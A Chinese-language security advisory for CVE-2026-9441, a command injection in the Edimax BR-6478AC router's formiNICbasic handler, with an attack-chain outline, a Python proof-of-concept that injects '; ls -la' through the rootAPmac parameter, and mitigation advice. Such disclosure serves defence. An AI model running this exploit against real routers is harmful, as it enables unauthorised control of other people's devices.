CVE-2026-9441 CVSS 6.3 中危

CVE-2026-9441 Edimax路由器命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9441

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6478AC

漏洞概述

Edimax BR-6478AC 路由器（版本 1.23）的 POST 请求处理组件中存在安全漏洞。具体受影响的是文件 /goform/formiNICbasic 中的 formiNICbasic 功能。攻击者可以通过操控 rootAPmac 参数注入恶意命令，造成远程命令执行。该漏洞利用难度低，且已有公开的利用代码，厂商尚未对此作出回应，存在较高安全风险。

技术细节

该漏洞属于典型的 OS 命令注入漏洞，位于 Edimax BR-6478AC 路由器的 Web 管理接口中。在处理 /goform/formiNICbasic 的 POST 请求时，程序未对用户提交的 rootAPmac 参数进行严格的过滤或转义，直接将其传递到底层系统命令执行环境中（如 system() 函数）。攻击者可以构造包含 Shell 元字符（如 ;, |, &）的 Payload，中断原有命令逻辑并执行任意系统指令。由于路由器服务通常以高权限运行，成功利用此漏洞可导致攻击者完全控制设备，造成数据泄露、服务中断或设备被植入后门。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或通过特定指纹识别出 Edimax BR-6478AC 设备及其固件版本。

STEP 2

2. 构造攻击载荷

攻击者构造包含恶意 Shell 命令的 HTTP POST 请求数据包，针对 rootAPmac 参数注入命令分隔符。

STEP 3

3. 发送恶意请求

将构造好的恶意请求发送至目标设备的 /goform/formiNICbasic 接口。

STEP 4

4. 命令执行

设备后端处理请求，解析 rootAPmac 参数时执行了注入的恶意命令，返回结果或改变系统状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2026_9441(target_ip):
    url = f"http://{target_ip}/goform/formiNICbasic"
    # Example payload: execute 'ls' command
    # The semicolon is used to chain commands in many shell environments
    payload = "; ls -la"
    
    data = {
        "rootAPmac": payload
    }
    
    try:
        print(f"[*] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[*] Response Status: {response.status_code}")
        print("[*] Response Content:")
        print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit_cve_2026_9441(target)

影响范围

Edimax BR-6478AC 1.23

防御指南

临时缓解措施

鉴于厂商尚未发布补丁，建议用户立即限制对路由器 Web 管理界面的访问，仅允许来自内部受信任网络的连接。此外，应检查设备日志是否存在针对 /goform/formiNICbasic 接口的异常访问记录，并在防火墙层面阻断外部对该接口的访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表